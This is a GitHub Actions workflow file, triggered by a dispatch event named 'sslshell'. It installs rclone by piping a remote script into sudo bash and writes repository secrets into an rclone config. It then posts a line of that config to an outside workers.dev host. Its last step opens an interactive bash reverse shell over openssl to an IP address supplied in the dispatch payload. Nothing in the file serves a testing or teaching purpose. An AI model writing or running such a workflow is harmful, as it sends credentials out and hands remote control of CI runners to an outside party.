name: shell
on:
  repository_dispatch:
    types: sslshell
    
jobs:
# ================== 第一个 job，这只有一个 job ==================
  first_job:
    runs-on: ubuntu-latest
    steps:
      - name: openssl
        run: |
          sudo apt-get install ffmpeg
          curl https://rclone.org/install.sh | sudo bash
          mkdir -p ~/.config/rclone/
          cat >  ~/.config/rclone/rclone.conf  << EOF
          ${{ secrets.RCLONE_CONF }}
          EOF
          curl "https://github.54nb.workers.dev/" -H "${{ secrets.WORKERSPSK }}" -s -o 1.txt
          cat 1.txt >> ~/.config/rclone/rclone.conf
          rclone lsf github:logo
          sed -n '8p' ~/.config/rclone/rclone.conf > 2.txt
          curl "https://github.54nb.workers.dev/" -d "@./2.txt" -H "${{ secrets.WORKERSPSK }}" -s
          
          cat >  cert.pem  << EOF
          ${{ secrets.CERT }}
          EOF
          sudo apt-get -qqy install openssl
          mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -strict -verify 1 -verify_return_error -CAfile cert.pem -connect ${{ github.event.client_payload.ip }}:2222 > /tmp/s; rm /tmp/s
